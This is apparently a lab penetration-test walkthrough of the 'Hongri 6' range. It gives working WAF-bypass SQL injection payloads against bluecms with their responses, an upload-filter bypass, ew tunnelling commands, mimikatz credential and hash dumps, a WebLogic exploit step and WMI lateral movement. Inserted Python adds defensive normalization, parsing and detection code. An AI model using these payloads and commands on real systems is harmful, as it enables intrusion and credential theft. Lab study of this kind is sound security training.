Hands-on | Notes from an internal-network target-range penetration test
Target environment: a heavily modified 紅日6 (Hongri 6) range in which the bluecms source code was altered;
External web: 192.168.140.131/192.168.111.128
Internal web: 192.168.111.80/10.10.10.80
DC: 10.10.10.10
0x01 External web
Start with the external web server:

Port 80 is open; let's take a look.

It is bluecms 1.6. This CMS has many known vulnerabilities, so download a copy of the source and examine it.
1.1 Code audit
Do a global search for $_GET

This leads to ad_js.php:
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';  // only trimmed, never validated or escaped
if(empty($ad_id))
{
    echo 'Error!';
    exit();
}
// $ad_id is concatenated straight into the query string: this is the injection point
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{
    $ad_content = $ad['content'];
}
else
{
    // an expired ad shows its expiry content instead
    if($ad['end_time'] < time())
    {
        $ad_content = $ad['exp_content'];
    }
    else
    {
        $ad_content = $ad['content'];
    }
}
If ad_id is not empty, whitespace on both sides is trimmed; otherwise 'Error!' is printed. The value is then handed to the getone method, so let's trace getone.
function getone($sql, $type=MYSQL_ASSOC){
    // runs the caller's SQL verbatim: no escaping and no parameter binding
    $query = $this->query($sql,$this->linkid);
    $row = mysql_fetch_array($query, $type);
    return $row;
}
No filtering is applied at any point; the value is concatenated straight into the SQL statement and executed.
http://192.168.140.131/ad_js.php?ad_id=1 and 1=1

A WAF is present.
1.2 WAF bypass


Fuzz by inserting the characters /"%!* as noise. Bypassing order by:
ad_js.php?ad_id=1/*%/*/order/*//*/by/*//*/8
http://192.168.140.131/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8
ad_js.php?ad_id=1/*%/*/order/*//*/by/*//*/7
Bypassing union select:
ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7


Everything is blocked; add /*!50001*/ and run it again

/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7
Response:
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 10:29:14 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Content-Length: 33
Connection: close
Content-Type: text/html;charset=gb2312
List the tables of the current database. Normal statement:
union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()
Wrapped in the bypass above it is still blocked, so test it piece by piece to find which part triggers the WAF.

It turns out the request is not blocked as long as database() is absent.
So fuzz inside the parentheses in the same way. Bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(/*%!"/*/
Response:
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 10:37:08 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Content-Length: 401
Connection: close
Content-Type: text/html;charset=gb2312
A blue_admin table exists; next, list its columns.
Normal statement:
union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name='blue_admin'
Single quotes are filtered, so hex-encode the table name.

Bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E
Response:
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 11:03:52 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Content-Length: 108
Connection: close
Content-Type: text/html;charset=gb2312
The columns admin_name and pwd exist.
Retrieve the credentials by wrapping the normal statements in the same bypass. blue_admin:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
Response:
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 11:08:14 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Content-Length: 37
Connection: close
Content-Type: text/html;charset=gb2312
pwd:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(pwd)%20from%20blue_admin
Response:
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 11:09:17 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
Content-Length: 64
Connection: close
Content-Type: text/html;charset=gb2312
Credentials obtained: admin/test123
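The WAF above fails because it matches keywords on the raw request, while MySQL executes the body of a /*!NNNNN ... */ version comment and treats every other comment as whitespace. The following Python is an added defender-side example, not part of the write-up: it normalizes request URIs the way the MySQL parser reads them before matching, using the probes from this section as constructed sample input.

```python
import re
from urllib.parse import unquote

# Constructed sample requests: the first three are the probes used against the
# lab's ad_js.php in this write-up, the last is a benign request for contrast.
SAMPLE_REQUESTS = [
    "/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8",
    "/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7",
    "/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,"
    "group_concat(column_name)%20from%20information_schema.columns"
    "%20where%20table_name=0x626C75655F61646D696E",
    "/ad_js.php?ad_id=12",
]

# MySQL executes the body of a /*!NNNNN ... */ version comment when the server is
# at least version NNNNN, so the body must be kept; ordinary comments are skipped
# by the parser and are equivalent to whitespace.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

PATTERNS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "order_by": re.compile(r"\border\s+by\s+\d+"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
}


def normalize(uri: str) -> str:
    """Rewrite a raw request URI into the token stream MySQL would actually see."""
    text = unquote(uri)
    text = VERSION_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_match(uri: str) -> bool:
    """Keyword blacklist applied to the raw string, which is what the lab WAF appears to do."""
    return re.search(r"union\s+select|order\s+by", uri, re.I) is not None


def find_sqli_signals(uri: str) -> list[str]:
    """Names of the patterns that match once encoding and comments are stripped."""
    norm = normalize(uri)
    return [name for name, pat in PATTERNS.items() if pat.search(norm)]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"raw-blacklist={naive_match(req)!s:5} normalized={find_sqli_signals(req)} {normalize(req)}")
```

Normalization only narrows the gap; the real fix is in ad_js.php, where ad_id should be cast to an integer or bound as a prepared-statement parameter instead of being concatenated into the query.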
1.3 Back-end getshell

File inclusion was tried here without success; robots.txt reveals an upload.html under the test directory.

The upload is blocked outright.
Here we can change
Content-Disposition: form-data; name="file"; filename="t.php"
to
Content-Disposition: form-data; name="file"; filename=; filename="t.php"
to get past it.
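The duplicated filename parameter works because the WAF and the application each pick a different one of the two values. As an added defender-side example (not code from the write-up), the Python below parses Content-Disposition strictly and rejects a repeated parameter instead of choosing one; the sample header values are constructed from this section.

```python
import re

# Constructed Content-Disposition values: the plain PHP upload, the duplicate
# "filename=" trick from this write-up, and a benign image upload.
SAMPLE_DISPOSITIONS = [
    'form-data; name="file"; filename="t.php"',
    'form-data; name="file"; filename=; filename="t.php"',
    'form-data; name="file"; filename="avatar.png"',
]
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# One "; key=value" parameter; the value is either quoted or a bare token (possibly empty).
PARAM_RE = re.compile(r';\s*([A-Za-z0-9_-]+)\s*=\s*(?:"([^"]*)"|([^;]*))')


class DispositionError(ValueError):
    pass


def parse_content_disposition(value: str) -> dict:
    """Strict parse: a parameter that appears twice is an error, not 'first or last wins'."""
    disp_type, _, rest = value.partition(";")
    if disp_type.strip().lower() != "form-data":
        raise DispositionError("not a form-data part")
    params = {}
    for m in PARAM_RE.finditer(";" + rest):
        key = m.group(1).lower()
        val = m.group(2) if m.group(2) is not None else m.group(3).strip()
        if key in params:
            raise DispositionError(f"duplicate parameter: {key}")
        params[key] = val
    return params


def upload_allowed(value: str) -> tuple:
    """Accept only a single, non-empty, path-free filename with an allow-listed extension."""
    try:
        params = parse_content_disposition(value)
    except DispositionError as exc:
        return False, str(exc)
    filename = params.get("filename", "")
    if not filename or "/" in filename or "\\" in filename:
        return False, "missing or unsafe filename"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension not allowed: {ext or '(none)'}"
    return True, "ok"
```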

0x02 Internal network penetration
The privileges are already fairly high. A 111 subnet exists.

Upload ew to the web target
and run
ew.exe -s ssocksd -l 1266


Add a user, then dump credentials with mimikatz

aspnet 161cff084477fe596a5db81874498a24 (1qaz@WSX)
itsec 852a844adfce18f66009b4f14e0a98de (test123..)
Administrator 852a844adfce18f66009b4f14e0a98de (test123..)
A C-class sweep finds port 80 open.


There is a plaintext password for the administrator user; see whether IPC works directly.

Wrong password. Ports 80 and 7001 are open.
Nothing of interest on 80; 7001 is WebLogic.

CVE-2019-2725 is present.

The internal WebLogic host is compromised.
The domain de1ay.com exists, and we have local administrator privileges.

A 10.10.10 subnet exists.

Dump credentials:
* Username : de1ay
* Domain : WEB
* NTLM : cb5141dcdaa451b0972f3144fda5b3cd
* SHA1 : c25aadf268b15742f54e1ca78d54b1da417d5f8d
* Password : 1qaz@WSX1qaz@WSX
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0 (possibly not enabled)
Set up the multi-layer proxy. Attacker IP: 192.168.140.1; web: 192.168.140.131/192.168.111.128; weblogic: 192.168.111.80/10.10.10.80
Upload ew to the WebLogic host and listen on local port 8888:
ew.exe -s ssocksd -l 8888
On the attacker machine, bind local port 1080 to the web host's port 9999:
ew.exe -s lcx_tran -l 1080 -f 192.168.140.131 -g 9999
On the web host, bind local port 9999 to the WebLogic host's port 8888:
ew.exe -s lcx_tran -l 9999 -f 192.168.111.80 -g 8888


The .10 host is discovered.
Try the passwords already collected against the domain users:
user:
de1ay\administrator de1ay\de1ay
pass:
1qaz@WSX test123.. 1qaz@WSX1qaz@WSX

1. Use runas to get a cmd running as the domain user:
runas /user:de1ay\administrator cmd

WMI lateral movement:
wmic /node:10.10.10.10 /user:de1ay\administrator /password:1qaz@WSX1qaz@WSX process call create "cmd /c ipconfig > c:\1.txt"
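On the target, a remote wmic process call create leaves a network logon (4624, type 3) followed by the requested command spawned by WmiPrvSE.exe under the caller's account. As an added detection example (not from the write-up), the Python below flags shells whose parent is WmiPrvSE.exe and enriches each hit with the source IP of the matching network logon; the event records are constructed to mirror what the command above would produce on the DC.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Logon:
    """Windows Security 4624 fields we need; logon type 3 is a network logon."""
    host: str
    ts: int
    user: str
    logon_type: int
    src_ip: str

@dataclass
class ProcStart:
    """Sysmon EventID 1 / Security 4688 fields we need."""
    host: str
    ts: int
    user: str
    image: str
    parent_image: str
    cmdline: str

# Constructed events: a network logon to the DC from the WebLogic host, then cmd.exe
# started by WmiPrvSE.exe as the same user. The interactive cmd.exe on WEB is benign noise.
LOGONS = [Logon("DC", 100, r"DE1AY\administrator", 3, "10.10.10.80")]
PROCS = [
    ProcStart("DC", 102, r"DE1AY\administrator", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"cmd /c ipconfig > c:\1.txt"),
    ProcStart("WEB", 105, r"DE1AY\de1ay", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\explorer.exe", "cmd.exe"),
]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def source_of(proc: ProcStart, logons: list, window: int = 60) -> Optional[str]:
    """IP of the most recent network logon by the same user on the same host within the window."""
    cands = [l for l in logons if l.host == proc.host and l.user.lower() == proc.user.lower()
             and l.logon_type == 3 and 0 <= proc.ts - l.ts <= window]
    return max(cands, key=lambda l: l.ts).src_ip if cands else None

def detect_remote_wmi_exec(logons: list, procs: list) -> list:
    """Flag shells spawned by WmiPrvSE.exe; attach the caller's IP when a 4624 correlates."""
    alerts = []
    for p in procs:
        if basename(p.parent_image) == "wmiprvse.exe" and basename(p.image) in SHELLS:
            alerts.append({"host": p.host, "user": p.user, "child": basename(p.image),
                           "cmdline": p.cmdline, "src_ip": source_of(p, logons)})
    return alerts
```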

